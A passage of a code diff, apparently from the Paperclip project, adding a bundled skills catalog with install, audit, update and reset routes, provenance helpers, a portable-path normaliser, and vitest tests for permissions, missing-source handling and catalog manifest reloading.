catalogSkillId: "paperclipai:bundled:software-development:review",
slug: "review",
});
expect(res.status, JSON.stringify(res.body)).toBe(201);
expect(mockCompanySkillService.installFromCatalog).toHaveBeenCalledWith("company-1", {
catalogSkillId: "paperclipai:bundled:software-development:review",
slug: "review",
});
expect(mockLogActivity).toHaveBeenCalledWith(expect.anything(), expect.objectContaining({
companyId: "company-1",
action: "company.skill_catalog_installed",
entityType: "company_skill",
entityId: "skill-1",
details: expect.objectContaining({
catalogId: "paperclipai:bundled:software-development:review",
catalogKey: "paperclipai/bundled/software-development/review",
originHash: "sha256:abc",
}),
}));
});
it("tracks public GitHub skill imports with an explicit skill reference", async () => {
mockCompanySkillService.importFromSource.mockResolvedValue({
imported: [
@ -274,6 +464,26 @@ describe("company skill mutation permissions", () => {
expect(mockCompanySkillService.importFromSource).not.toHaveBeenCalled();
});
it("blocks agent catalog installs for other companies", async () => {
mockAgentService.getById.mockResolvedValue({
id: "agent-1",
companyId: "company-1",
permissions: { canCreateAgents: true },
});
const res = await request(await createApp({
type: "agent",
agentId: "agent-1",
companyId: "company-1",
runId: "run-1",
}))
.post("/api/companies/company-2/skills/install-catalog")
.send({ catalogSkillId: "paperclipai:bundled:software-development:review" });
expect(res.status, JSON.stringify(res.body)).toBe(403);
expect(mockCompanySkillService.installFromCatalog).not.toHaveBeenCalled();
});
it("allows agents with canCreateAgents to mutate company skills", async () => {
mockAgentService.getById.mockResolvedValue({
id: "agent-1",

300
server/src/__tests__/company-skills-service.test.ts
View file

@ -3,7 +3,7 @@ import os from "node:os";
import path from "node:path";
import { promises as fs } from "node:fs";
import { afterAll, afterEach, beforeAll, describe, expect, it } from "vitest";
import { companies, companySkills, createDb } from "@paperclipai/db";
import { agents, companies, companySkills, createDb } from "@paperclipai/db";
import {
getEmbeddedPostgresTestSupport,
startEmbeddedPostgresTestDatabase,
@ -23,15 +23,21 @@ describeEmbeddedPostgres("companySkillService.list", () => {
let db!: ReturnType<typeof createDb>;
let svc!: ReturnType<typeof companySkillService>;
let tempDb: Awaited<ReturnType<typeof startEmbeddedPostgresTestDatabase>> | null = null;
let oldPaperclipHome: string | undefined;
let paperclipHome: string | null = null;
const cleanupDirs = new Set<string>();
beforeAll(async () => {
tempDb = await startEmbeddedPostgresTestDatabase("paperclip-company-skills-service-");
oldPaperclipHome = process.env.PAPERCLIP_HOME;
paperclipHome = await fs.mkdtemp(path.join(os.tmpdir(), "paperclip-company-skills-home-"));
process.env.PAPERCLIP_HOME = paperclipHome;
db = createDb(tempDb.connectionString);
svc = companySkillService(db);
}, 20_000);
afterEach(async () => {
await db.delete(agents);
await db.delete(companySkills);
await db.delete(companies);
await Promise.all(Array.from(cleanupDirs, (dir) => fs.rm(dir, { recursive: true, force: true })));
@ -39,6 +45,11 @@ describeEmbeddedPostgres("companySkillService.list", () => {
});
afterAll(async () => {
if (oldPaperclipHome === undefined) delete process.env.PAPERCLIP_HOME;
else process.env.PAPERCLIP_HOME = oldPaperclipHome;
if (paperclipHome) {
await fs.rm(paperclipHome, { recursive: true, force: true });
}
await tempDb?.cleanup();
});
@ -96,4 +107,291 @@ describeEmbeddedPostgres("companySkillService.list", () => {
message: "Company not found",
});
});
it("does not persist audit failures for remote-source skills", async () => {
const companyId = randomUUID();
const skillId = randomUUID();
await db.insert(companies).values({
id: companyId,
name: "Paperclip",
issuePrefix: `T${companyId.replace(/-/g, "").slice(0, 6).toUpperCase()}`,
requireBoardApprovalForNewAgents: false,
});
await db.insert(companySkills).values({
id: skillId,
companyId,
key: "github.com/acme/remote-skill",
slug: "remote-skill",
name: "Remote Skill",
description: null,
markdown: "# Remote Skill\n",
sourceType: "github",
sourceLocator: "https://github.com/acme/remote-skill",
sourceRef: "main",
trustLevel: "markdown_only",
compatibility: "compatible",
fileInventory: [{ path: "SKILL.md", kind: "skill" }],
metadata: { sourceKind: "github", owner: "acme", repo: "remote-skill" },
});
await expect(svc.auditSkill(companyId, skillId)).rejects.toMatchObject({
status: 422,
message: "Only local-path and catalog-managed company skills support audit.",
});
await expect(svc.getById(companyId, skillId)).resolves.toMatchObject({
metadata: { sourceKind: "github", owner: "acme", repo: "remote-skill" },
});
});
it("preserves missing local-path skills that active agents still desire", async () => {
const companyId = randomUUID();
const skillId = randomUUID();
const skillKey = `company/${companyId}/reflection-coach`;
const missingSkillDir = path.join(await fs.mkdtemp(path.join(os.tmpdir(), "paperclip-missing-used-skill-")), "gone");
cleanupDirs.add(path.dirname(missingSkillDir));
await db.insert(companies).values({
id: companyId,
name: "Paperclip",
issuePrefix: `T${companyId.replace(/-/g, "").slice(0, 6).toUpperCase()}`,
requireBoardApprovalForNewAgents: false,
});
await db.insert(companySkills).values({
id: skillId,
companyId,
key: skillKey,
slug: "reflection-coach",
name: "Reflection Coach",
description: null,
markdown: "# Reflection Coach\n",
sourceType: "local_path",
sourceLocator: missingSkillDir,
trustLevel: "markdown_only",
compatibility: "compatible",
fileInventory: [{ path: "SKILL.md", kind: "skill" }],
metadata: { sourceKind: "local_path" },
});
await db.insert(agents).values({
id: randomUUID(),
companyId,
name: "Reviewer",
role: "engineer",
status: "active",
adapterType: "codex_local",
adapterConfig: {
paperclipSkillSync: {
desiredSkills: [skillKey],
},
},
});
const listed = await svc.list(companyId);
const listedSkill = listed.find((skill) => skill.id === skillId);
const detail = await svc.detail(companyId, skillId);
const stored = await svc.getById(companyId, skillId);
const marker = stored?.metadata?.missingSource;
expect(listedSkill).toMatchObject({
id: skillId,
attachedAgentCount: 1,
});
expect(detail?.usedByAgents).toEqual([
expect.objectContaining({
name: "Reviewer",
desired: true,
}),
]);
expect(marker).toMatchObject({
reason: "local_source_missing",
sourceType: "local_path",
sourceLocator: missingSkillDir,
sourcePath: missingSkillDir,
});
expect(Number.isNaN(Date.parse(String((marker as Record<string, unknown>).detectedAt)))).toBe(false);
});
it("continues pruning missing local-path skills that no active agent desires", async () => {
const companyId = randomUUID();
const skillId = randomUUID();
const missingSkillDir = path.join(await fs.mkdtemp(path.join(os.tmpdir(), "paperclip-missing-unused-skill-")), "gone");
cleanupDirs.add(path.dirname(missingSkillDir));
await db.insert(companies).values({
id: companyId,
name: "Paperclip",
issuePrefix: `T${companyId.replace(/-/g, "").slice(0, 6).toUpperCase()}`,
requireBoardApprovalForNewAgents: false,
});
await db.insert(companySkills).values({
id: skillId,
companyId,
key: `company/${companyId}/unused-skill`,
slug: "unused-skill",
name: "Unused Skill",
description: null,
markdown: "# Unused Skill\n",
sourceType: "local_path",
sourceLocator: missingSkillDir,
trustLevel: "markdown_only",
compatibility: "compatible",
fileInventory: [{ path: "SKILL.md", kind: "skill" }],
metadata: { sourceKind: "local_path" },
});
const listed = await svc.list(companyId);
expect(listed.find((skill) => skill.id === skillId)).toBeUndefined();
await expect(svc.getById(companyId, skillId)).resolves.toBeNull();
});
it("clears the missing-source marker when a local-path skill source returns", async () => {
const companyId = randomUUID();
const skillId = randomUUID();
const skillDir = await fs.mkdtemp(path.join(os.tmpdir(), "paperclip-restored-skill-"));
cleanupDirs.add(skillDir);
await fs.writeFile(path.join(skillDir, "SKILL.md"), "# Restored Skill\n", "utf8");
await db.insert(companies).values({
id: companyId,
name: "Paperclip",
issuePrefix: `T${companyId.replace(/-/g, "").slice(0, 6).toUpperCase()}`,
requireBoardApprovalForNewAgents: false,
});
await db.insert(companySkills).values({
id: skillId,
companyId,
key: `company/${companyId}/restored-skill`,
slug: "restored-skill",
name: "Restored Skill",
description: null,
markdown: "# Restored Skill\n",
sourceType: "local_path",
sourceLocator: skillDir,
trustLevel: "markdown_only",
compatibility: "compatible",
fileInventory: [{ path: "SKILL.md", kind: "skill" }],
metadata: {
sourceKind: "local_path",
missingSource: {
reason: "local_source_missing",
sourceType: "local_path",
sourceLocator: skillDir,
sourcePath: skillDir,
detectedAt: "2026-05-28T00:00:00.000Z",
},
},
});
await svc.list(companyId);
const stored = await svc.getById(companyId, skillId);
expect(stored?.metadata).toEqual({ sourceKind: "local_path" });
});
it("marks source-missing company skills as unavailable during read-only runtime listing", async () => {
const companyId = randomUUID();
const skillId = randomUUID();
const skillKey = `company/${companyId}/reflection-coach`;
const missingSkillDir = path.join(await fs.mkdtemp(path.join(os.tmpdir(), "paperclip-readonly-missing-skill-")), "gone");
cleanupDirs.add(path.dirname(missingSkillDir));
await db.insert(companies).values({
id: companyId,
name: "Paperclip",
issuePrefix: `T${companyId.replace(/-/g, "").slice(0, 6).toUpperCase()}`,
requireBoardApprovalForNewAgents: false,
});
await db.insert(companySkills).values({
id: skillId,
companyId,
key: skillKey,
slug: "reflection-coach",
name: "Reflection Coach",
description: null,
markdown: "# Reflection Coach\n",
sourceType: "local_path",
sourceLocator: missingSkillDir,
trustLevel: "markdown_only",
compatibility: "compatible",
fileInventory: [{ path: "SKILL.md", kind: "skill" }],
metadata: { sourceKind: "local_path" },
});
await db.insert(agents).values({
id: randomUUID(),
companyId,
name: "Reviewer",
role: "engineer",
status: "active",
adapterType: "codex_local",
adapterConfig: {
paperclipSkillSync: {
desiredSkills: [skillKey],
},
},
});
const entries = await svc.listRuntimeSkillEntries(companyId, { materializeMissing: false });
const entry = entries.find((candidate) => candidate.key === skillKey);
expect(entry).toMatchObject({
key: skillKey,
sourceStatus: "missing",
missingDetail: expect.stringContaining(missingSkillDir),
});
await expect(fs.stat(entry!.source)).rejects.toMatchObject({ code: "ENOENT" });
});
it("materializes source-missing company skills from the stored markdown during runtime listing", async () => {
const companyId = randomUUID();
const skillId = randomUUID();
const skillKey = `company/${companyId}/runtime-coach`;
const missingSkillDir = path.join(await fs.mkdtemp(path.join(os.tmpdir(), "paperclip-runtime-missing-skill-")), "gone");
cleanupDirs.add(path.dirname(missingSkillDir));
await db.insert(companies).values({
id: companyId,
name: "Paperclip",
issuePrefix: `T${companyId.replace(/-/g, "").slice(0, 6).toUpperCase()}`,
requireBoardApprovalForNewAgents: false,
});
await db.insert(companySkills).values({
id: skillId,
companyId,
key: skillKey,
slug: "runtime-coach",
name: "Runtime Coach",
description: null,
markdown: "# Runtime Coach\n\nRecovered from DB.\n",
sourceType: "local_path",
sourceLocator: missingSkillDir,
trustLevel: "markdown_only",
compatibility: "compatible",
fileInventory: [{ path: "SKILL.md", kind: "skill" }],
metadata: { sourceKind: "local_path" },
});
await db.insert(agents).values({
id: randomUUID(),
companyId,
name: "Runner",
role: "engineer",
status: "active",
adapterType: "codex_local",
adapterConfig: {
paperclipSkillSync: {
desiredSkills: [skillKey],
},
},
});
const entries = await svc.listRuntimeSkillEntries(companyId);
const entry = entries.find((candidate) => candidate.key === skillKey);
expect(entry).toMatchObject({
key: skillKey,
sourceStatus: "available",
});
await expect(fs.readFile(path.join(entry!.source, "SKILL.md"), "utf8")).resolves.toBe(
"# Runtime Coach\n\nRecovered from DB.\n",
);
});
});

59
server/src/__tests__/grok-local-skill-sync.test.ts Normal file
View file

@ -0,0 +1,59 @@
import { describe, expect, it } from "vitest";
import {
listGrokSkills,
syncGrokSkills,
} from "@paperclipai/adapter-grok-local/server";
describe("grok local skill sync", () => {
const paperclipKey = "paperclipai/paperclip/paperclip";
const createAgentKey = "paperclipai/paperclip/paperclip-create-agent";
it("reports Grok skills as ephemeral workspace-mounted state", async () => {
const snapshot = await listGrokSkills({
agentId: "agent-1",
companyId: "company-1",
adapterType: "grok_local",
config: {
paperclipSkillSync: {
desiredSkills: [paperclipKey],
},
},
});
expect(snapshot.adapterType).toBe("grok_local");
expect(snapshot.supported).toBe(true);
expect(snapshot.mode).toBe("ephemeral");
expect(snapshot.desiredSkills).toContain(paperclipKey);
expect(snapshot.desiredSkills).toContain(createAgentKey);
expect(snapshot.entries.find((entry) => entry.key === paperclipKey)).toMatchObject({
required: true,
state: "configured",
detail: "Will be copied into `.claude/skills` in the execution workspace on the next run.",
});
});
it("tracks unavailable desired Grok skills as missing without persistent install state", async () => {
const snapshot = await syncGrokSkills({
agentId: "agent-2",
companyId: "company-1",
adapterType: "grok_local",
config: {
paperclipRuntimeSkills: [],
paperclipSkillSync: {
desiredSkills: ["unknown-skill"],
},
},
}, ["unknown-skill"]);
expect(snapshot.mode).toBe("ephemeral");
expect(snapshot.warnings).toContain(
'Desired skill "unknown-skill" is not available from the Paperclip skills directory.',
);
expect(snapshot.entries).toContainEqual(expect.objectContaining({
key: "unknown-skill",
state: "missing",
origin: "external_unknown",
targetPath: null,
}));
});
});

113
server/src/__tests__/skills-catalog-service.test.ts Normal file
View file

@ -0,0 +1,113 @@
import { beforeEach, describe, expect, it, vi } from "vitest";
import type { CatalogSkill } from "@paperclipai/shared";
const mockExistsSync = vi.hoisted(() => vi.fn());
const mockReadFileSync = vi.hoisted(() => vi.fn());
const mockStatSync = vi.hoisted(() => vi.fn());
const mockReadFile = vi.hoisted(() => vi.fn());
vi.doMock("node:fs", async () => {
const actual = await vi.importActual<typeof import("node:fs")>("node:fs");
return {
...actual,
existsSync: mockExistsSync,
readFileSync: mockReadFileSync,
statSync: mockStatSync,
promises: {
...actual.promises,
readFile: mockReadFile,
},
};
});
function catalogSkill(slug: string, name = slug): CatalogSkill {
return {
id: `paperclipai:bundled:software-development:${slug}`,
key: `paperclipai/bundled/software-development/${slug}`,
kind: "bundled",
category: "software-development",
slug,
name,
description: `${name} catalog skill used by the reload test.`,
path: `catalog/bundled/software-development/${slug}`,
entrypoint: "SKILL.md",
trustLevel: "markdown_only",
compatibility: "compatible",
defaultInstall: false,
recommendedForRoles: ["engineer"],
requires: [],
tags: ["test"],
files: [{ path: "SKILL.md", kind: "skill", sizeBytes: 8, sha256: `sha256:${slug}` }],
contentHash: `sha256:${slug}`,
};
}
function manifest(skills: CatalogSkill[], packageVersion = "0.3.1") {
return JSON.stringify({
schemaVersion: 1,
packageName: "@paperclipai/skills-catalog",
packageVersion,
generatedAt: "2026-05-28T00:00:00.000Z",
skills,
});
}
describe("skills catalog service", () => {
let manifestJson: string;
let manifestMtimeMs: number;
beforeEach(() => {
vi.resetModules();
vi.clearAllMocks();
manifestJson = manifest([catalogSkill("old-skill", "Old Skill")]);
manifestMtimeMs = 1;
mockExistsSync.mockReturnValue(true);
mockReadFileSync.mockImplementation(() => manifestJson);
mockStatSync.mockImplementation(() => ({
mtimeMs: manifestMtimeMs,
size: Buffer.byteLength(manifestJson),
}));
mockReadFile.mockImplementation(async (filePath: string) => `content:${filePath}`);
});
it("caches and reloads the generated catalog manifest when it changes", async () => {
const service = await import("../services/skills-catalog.js");
expect(service.listCatalogSkills().map((skill) => skill.key)).toEqual([
"paperclipai/bundled/software-development/old-skill",
]);
expect(service.listCatalogSkills().map((skill) => skill.key)).toEqual([
"paperclipai/bundled/software-development/old-skill",
]);
expect(mockReadFileSync).toHaveBeenCalledTimes(1);
manifestJson = manifest([catalogSkill("new-skill", "New Skill")], "0.3.2");
manifestMtimeMs += 1;
expect(service.listCatalogSkills().map((skill) => skill.key)).toEqual([
"paperclipai/bundled/software-development/new-skill",
]);
expect(mockReadFileSync).toHaveBeenCalledTimes(2);
expect(() => service.getCatalogSkillOrThrow("old-skill")).toThrow("Catalog skill not found");
expect(service.getCatalogPackageMetadata()).toEqual({
packageName: "@paperclipai/skills-catalog",
packageVersion: "0.3.2",
});
});
it("rejects catalog asset previews without decoding bytes as utf8", async () => {
const imageSkill = catalogSkill("with-image", "With Image");
imageSkill.files = [
...imageSkill.files,
{ path: "assets/logo.png", kind: "asset", sizeBytes: 4, sha256: "sha256:logo" },
];
manifestJson = manifest([imageSkill]);
const service = await import("../services/skills-catalog.js");
await expect(service.readCatalogSkillFile(imageSkill.id, "assets/logo.png")).rejects.toMatchObject({
status: 415,
message: "Catalog asset previews are not supported.",
});
expect(mockReadFile).not.toHaveBeenCalled();
});
});

4
server/src/__tests__/workspace-runtime.test.ts
View file

@ -1947,7 +1947,7 @@ describe("realizeExecutionWorkspace", () => {
config: {
workspaceStrategy: {
type: "git_worktree",
// No baseRef configured — origin/HEAD should win over fallback branches.
// No baseRef configured — origin/master is preferred over the symbolic-ref.
},
},
issue: {
@ -1967,7 +1967,7 @@ describe("realizeExecutionWorkspace", () => {
expect(workspace.created).toBe(true);
const worktreeOp = operations.find(op => op.phase === "worktree_prepare" && op.metadata?.created);
expect(worktreeOp).toBeDefined();
expect(worktreeOp!.metadata!.baseRef).toBe("origin/main");
expect(worktreeOp!.metadata!.baseRef).toBe("origin/master");
}, 10_000);
it("removes a created git worktree and branch during cleanup", async () => {

7
server/src/routes/agents.ts
View file

@ -1217,9 +1217,13 @@ export function agentRoutes(
companyId: string,
adapterType: string,
config: Record<string, unknown>,
options: {
materializeMissing?: boolean;
} = {},
) {
const runtimeSkillEntries = await companySkills.listRuntimeSkillEntries(companyId, {
materializeMissing: shouldMaterializeRuntimeSkillsForAdapter(adapterType),
materializeMissing: options.materializeMissing
?? shouldMaterializeRuntimeSkillsForAdapter(adapterType),
});
return {
...config,
@ -1486,6 +1490,7 @@ export function agentRoutes(
agent.companyId,
agent.adapterType,
runtimeConfig,
{ materializeMissing: false },
);
const snapshot = await adapter.listSkills({
agentId: agent.id,

206
server/src/routes/company-skills.ts
View file

@ -1,16 +1,21 @@
import { Router, type Request } from "express";
import type { Db } from "@paperclipai/db";
import {
catalogSkillListQuerySchema,
companySkillCreateSchema,
companySkillFileUpdateSchema,
companySkillImportSchema,
companySkillInstallCatalogSchema,
companySkillInstallUpdateSchema,
companySkillProjectScanRequestSchema,
companySkillResetSchema,
} from "@paperclipai/shared";
import { trackSkillImported } from "@paperclipai/shared/telemetry";
import { validate } from "../middleware/validate.js";
import { accessService, agentService, companySkillService, logActivity } from "../services/index.js";
import { getCatalogSkillOrThrow, listCatalogSkills, readCatalogSkillFile } from "../services/skills-catalog.js";
import { forbidden } from "../errors.js";
import { assertCompanyAccess, getActorInfo } from "./authz.js";
import { assertAuthenticated, assertCompanyAccess, getActorInfo } from "./authz.js";
import { getTelemetryClient } from "../telemetry.js";
type SkillTelemetryInput = {
@ -52,6 +57,12 @@ export function companySkillRoutes(db: Db) {
return skill.key;
}
function firstQueryString(value: unknown): string | undefined {
if (typeof value === "string") return value;
if (Array.isArray(value) && typeof value[0] === "string") return value[0];
return undefined;
}
async function assertCanMutateCompanySkills(req: Request, companyId: string) {
assertCompanyAccess(req, companyId);
@ -81,6 +92,29 @@ export function companySkillRoutes(db: Db) {
throw forbidden("Missing permission: can create agents");
}
router.get("/skills/catalog", async (req, res) => {
assertAuthenticated(req);
const query = catalogSkillListQuerySchema.parse({
kind: firstQueryString(req.query.kind),
category: firstQueryString(req.query.category),
q: firstQueryString(req.query.q),
});
res.json(listCatalogSkills(query));
});
router.get("/skills/catalog/:catalogId/files", async (req, res) => {
assertAuthenticated(req);
const catalogRef = firstQueryString(req.query.ref) ?? (req.params.catalogId as string);
const relativePath = firstQueryString(req.query.path) ?? "SKILL.md";
res.json(await readCatalogSkillFile(catalogRef, relativePath));
});
router.get("/skills/catalog/:catalogId", async (req, res) => {
assertAuthenticated(req);
const catalogRef = firstQueryString(req.query.ref) ?? (req.params.catalogId as string);
res.json(getCatalogSkillOrThrow(catalogRef));
});
router.get("/companies/:companyId/skills", async (req, res) => {
const companyId = req.params.companyId as string;
assertCompanyAccess(req, companyId);
@ -227,6 +261,38 @@ export function companySkillRoutes(db: Db) {
},
);
router.post(
"/companies/:companyId/skills/install-catalog",
validate(companySkillInstallCatalogSchema),
async (req, res) => {
const companyId = req.params.companyId as string;
await assertCanMutateCompanySkills(req, companyId);
const result = await svc.installFromCatalog(companyId, req.body);
const actor = getActorInfo(req);
await logActivity(db, {
companyId,
actorType: actor.actorType,
actorId: actor.actorId,
agentId: actor.agentId,
runId: actor.runId,
action: result.action === "created" ? "company.skill_catalog_installed" : "company.skill_catalog_updated",
entityType: "company_skill",
entityId: result.skill.id,
details: {
action: result.action,
catalogId: result.catalogSkill.id,
catalogKey: result.catalogSkill.key,
slug: result.skill.slug,
originHash: result.catalogSkill.contentHash,
warningCount: result.warnings.length,
},
});
res.status(result.action === "created" ? 201 : 200).json(result);
},
);
router.post(
"/companies/:companyId/skills/scan-projects",
validate(companySkillProjectScanRequestSchema),
@ -289,34 +355,120 @@ export function companySkillRoutes(db: Db) {
res.json(result);
});
router.post("/companies/:companyId/skills/:skillId/install-update", async (req, res) => {
const companyId = req.params.companyId as string;
const skillId = req.params.skillId as string;
await assertCanMutateCompanySkills(req, companyId);
const result = await svc.installUpdate(companyId, skillId);
if (!result) {
res.status(404).json({ error: "Skill not found" });
return;
}
router.post(
"/companies/:companyId/skills/:skillId/audit",
async (req, res) => {
const companyId = req.params.companyId as string;
const skillId = req.params.skillId as string;
await assertCanMutateCompanySkills(req, companyId);
const result = await svc.auditSkill(companyId, skillId);
if (!result) {
res.status(404).json({ error: "Skill not found" });
return;
}
const actor = getActorInfo(req);
await logActivity(db, {
companyId,
actorType: actor.actorType,
actorId: actor.actorId,
agentId: actor.agentId,
runId: actor.runId,
action: "company.skill_update_installed",
entityType: "company_skill",
entityId: result.id,
details: {
slug: result.slug,
sourceRef: result.sourceRef,
},
});
const actor = getActorInfo(req);
await logActivity(db, {
companyId,
actorType: actor.actorType,
actorId: actor.actorId,
agentId: actor.agentId,
runId: actor.runId,
action: "company.skill_audited",
entityType: "company_skill",
entityId: skillId,
details: {
verdict: result.verdict,
codes: result.codes,
installedHash: result.installedHash,
originHash: result.originHash,
scanVersion: result.scanVersion,
},
});
res.json(result);
});
res.json(result);
},
);
router.post(
"/companies/:companyId/skills/:skillId/install-update",
validate(companySkillInstallUpdateSchema),
async (req, res) => {
const companyId = req.params.companyId as string;
const skillId = req.params.skillId as string;
await assertCanMutateCompanySkills(req, companyId);
const before = await svc.getById(companyId, skillId);
const result = await svc.installUpdate(companyId, skillId, req.body);
if (!result) {
res.status(404).json({ error: "Skill not found" });
return;
}
const actor = getActorInfo(req);
await logActivity(db, {
companyId,
actorType: actor.actorType,
actorId: actor.actorId,
agentId: actor.agentId,
runId: actor.runId,
action: "company.skill_update_installed",
entityType: "company_skill",
entityId: result.id,
details: {
slug: result.slug,
previousOriginHash: before?.metadata?.originHash ?? before?.sourceRef ?? null,
previousOriginVersion: before?.metadata?.originVersion ?? null,
newOriginHash: result.metadata?.originHash ?? result.sourceRef,
newOriginVersion: result.metadata?.originVersion ?? null,
driftDetected: Boolean(before?.metadata?.userModifiedAt),
force: Boolean(req.body.force),
auditVerdict: result.metadata?.auditVerdict ?? null,
},
});
res.json(result);
},
);
router.post(
"/companies/:companyId/skills/:skillId/reset",
validate(companySkillResetSchema),
async (req, res) => {
const companyId = req.params.companyId as string;
const skillId = req.params.skillId as string;
await assertCanMutateCompanySkills(req, companyId);
const before = await svc.getById(companyId, skillId);
const result = await svc.resetSkill(companyId, skillId, req.body);
if (!result) {
res.status(404).json({ error: "Skill not found" });
return;
}
const actor = getActorInfo(req);
await logActivity(db, {
companyId,
actorType: actor.actorType,
actorId: actor.actorId,
agentId: actor.agentId,
runId: actor.runId,
action: "company.skill_reset",
entityType: "company_skill",
entityId: result.id,
details: {
slug: result.slug,
previousOriginHash: before?.metadata?.originHash ?? before?.sourceRef ?? null,
previousOriginVersion: before?.metadata?.originVersion ?? null,
newOriginHash: result.metadata?.originHash ?? result.sourceRef,
newOriginVersion: result.metadata?.originVersion ?? null,
driftDetected: Boolean(before?.metadata?.userModifiedAt),
force: Boolean(req.body.force),
auditVerdict: result.metadata?.auditVerdict ?? null,
},
});
res.json(result);
},
);
return router;
}

65
server/src/services/catalog-provenance.ts Normal file
View file

@ -0,0 +1,65 @@
export const PORTABLE_CATALOG_PROVENANCE_STRING_KEYS = [
"sourceRef",
"originHash",
"catalogId",
"catalogKey",
"catalogKind",
"catalogCategory",
"catalogPath",
"packageName",
"packageVersion",
"originVersion",
"installedHash",
"userModifiedAt",
"updateHoldReason",
"auditVerdict",
"auditScannedAt",
"auditScanVersion",
] as const;
function asCatalogString(value: unknown) {
if (typeof value !== "string") return null;
const trimmed = value.trim();
return trimmed.length > 0 ? trimmed : null;
}
export function readCatalogStringList(value: unknown) {
if (!Array.isArray(value)) return null;
const entries = value.map((entry) => asCatalogString(entry)).filter((entry): entry is string => Boolean(entry));
return entries.length === value.length ? entries : null;
}
function isCatalogRecord(value: unknown): value is Record<string, unknown> {
return typeof value === "object" && value !== null && !Array.isArray(value);
}
export function readPortableCatalogProvenance(
metadata: Record<string, unknown> | null,
canonicalKey: string | null = null,
) {
const paperclip = isCatalogRecord(metadata?.paperclip) ? metadata.paperclip : null;
const catalog = isCatalogRecord(paperclip?.catalog) ? paperclip.catalog : null;
if (!catalog) return null;
const sourceRef = asCatalogString(catalog.sourceRef) ?? asCatalogString(catalog.originHash);
const normalized: Record<string, unknown> = {
...(canonicalKey ? { skillKey: canonicalKey } : {}),
sourceKind: "catalog",
};
const catalogSkillKey = asCatalogString(catalog.skillKey);
if (!canonicalKey && catalogSkillKey) normalized.skillKey = catalogSkillKey;
for (const key of PORTABLE_CATALOG_PROVENANCE_STRING_KEYS) {
if (key === "sourceRef") continue;
const value = asCatalogString(catalog[key]);
if (value) normalized[key] = value;
}
if (sourceRef && !normalized.originHash) normalized.originHash = sourceRef;
const auditCodes = readCatalogStringList(catalog.auditCodes);
if (auditCodes) normalized.auditCodes = auditCodes;
return {
sourceRef,
metadata: normalized,
};
}

59
server/src/services/company-portability.ts
View file

@ -70,6 +70,12 @@ import { issueService } from "./issues.js";
import { projectService } from "./projects.js";
import { routineService } from "./routines.js";
import { secretService } from "./secrets.js";
import {
PORTABLE_CATALOG_PROVENANCE_STRING_KEYS,
readCatalogStringList,
readPortableCatalogProvenance,
} from "./catalog-provenance.js";
import { normalizePortablePath } from "./portable-path.js";
/** Build OrgNode tree from manifest agent list (slug + reportsToSlug). */
function buildOrgTreeFromManifest(agents: CompanyPortabilityManifest["agents"]): OrgNode[] {
@ -228,6 +234,28 @@ function readSkillSourceKind(skill: CompanySkill) {
return asString(metadata?.sourceKind);
}
function buildPortableCatalogProvenance(skill: CompanySkill) {
if (skill.sourceType !== "catalog") return null;
const metadata = isPlainRecord(skill.metadata) ? skill.metadata : null;
const provenance: Record<string, unknown> = {
skillKey: skill.key,
};
const sourceRef = asString(skill.sourceRef) ?? asString(metadata?.originHash);
if (sourceRef) provenance.sourceRef = sourceRef;
for (const key of PORTABLE_CATALOG_PROVENANCE_STRING_KEYS) {
if (key === "sourceRef") continue;
const value = asString(metadata?.[key]);
if (value) provenance[key] = value;
}
const auditCodes = readCatalogStringList(metadata?.auditCodes);
if (auditCodes) provenance.auditCodes = auditCodes;
return Object.keys(provenance).length > 1 ? provenance : null;
}
function deriveLocalExportNamespace(skill: CompanySkill, slug: string) {
const metadata = isPlainRecord(skill.metadata) ? skill.metadata : null;
const candidates = [
@ -1415,20 +1443,6 @@ function normalizeInclude(input?: Partial<CompanyPortabilityInclude>): CompanyPo
};
}
function normalizePortablePath(input: string) {
const normalized = input.replace(/\\/g, "/").replace(/^\.\/+/, "");
const parts: string[] = [];
for (const segment of normalized.split("/")) {
if (!segment || segment === ".") continue;
if (segment === "..") {
if (parts.length > 0) parts.pop();
continue;
}
parts.push(segment);
}
return parts.join("/");
}
function resolvePortablePath(fromPath: string, targetPath: string) {
const baseDir = path.posix.dirname(fromPath.replace(/\\/g, "/"));
return normalizePortablePath(path.posix.join(baseDir, targetPath.replace(/\\/g, "/")));
@ -2126,12 +2140,14 @@ async function withSkillSourceMetadata(skill: CompanySkill, markdown: string) {
if (sourceEntry) {
metadata.sources = [...existingSources, sourceEntry];
}
const catalogProvenance = buildPortableCatalogProvenance(skill);
metadata.skillKey = skill.key;
metadata.paperclipSkillKey = skill.key;
metadata.paperclip = {
...(isPlainRecord(metadata.paperclip) ? metadata.paperclip : {}),
skillKey: skill.key,
slug: skill.slug,
...(catalogProvenance ? { catalog: catalogProvenance } : {}),
};
const frontmatter = {
...parsed.frontmatter,
@ -2668,10 +2684,17 @@ function buildManifestFromPackageFiles(
normalizedMetadata = {
sourceKind: "url",
};
} else if (metadata) {
normalizedMetadata = {
sourceKind: "catalog",
};
} else {
const catalogProvenance = readPortableCatalogProvenance(metadata);
if (catalogProvenance) {
sourceType = "catalog";
sourceRef = catalogProvenance.sourceRef;
normalizedMetadata = catalogProvenance.metadata;
} else if (metadata) {
normalizedMetadata = {
sourceKind: "catalog",
};
}
}
const key = deriveManifestSkillKey(frontmatter, slug, normalizedMetadata, sourceType, sourceLocator);

1034
server/src/services/company-skills.ts
View file

File diff suppressed because it is too large Load diff

12
server/src/services/portable-path.ts Normal file
View file

@ -0,0 +1,12 @@
export function normalizePortablePath(input: string) {
const parts: string[] = [];
for (const segment of input.replace(/\\/g, "/").replace(/^\.\/+/, "").replace(/^\/+/, "").split("/")) {
if (!segment || segment === ".") continue;
if (segment === "..") {
if (parts.length > 0) parts.pop();
continue;
}
parts.push(segment);
}
return parts.join("/");
}

201
server/src/services/skills-catalog.ts Normal file
View file

@ -0,0 +1,201 @@
import { existsSync, readFileSync, statSync } from "node:fs";
import { promises as fs } from "node:fs";
import path from "node:path";
import { fileURLToPath } from "node:url";
import type {
CatalogSkill,
CatalogSkillFileDetail,
CatalogSkillListQuery,
} from "@paperclipai/shared";
import { HttpError, conflict, notFound } from "../errors.js";
import { normalizePortablePath } from "./portable-path.js";
interface CatalogManifestFile {
packageName: string;
packageVersion: string;
skills: CatalogSkill[];
}
const serviceDir = path.dirname(fileURLToPath(import.meta.url));
const repoRoot = path.resolve(serviceDir, "../../..");
const catalogPackageRoot = path.join(repoRoot, "packages/skills-catalog");
const catalogManifestPath = path.join(catalogPackageRoot, "generated/catalog.json");
let cachedCatalogManifest: {
manifest: CatalogManifestFile;
mtimeMs: number;
size: number;
} | null = null;
function loadCatalogManifest(): CatalogManifestFile {
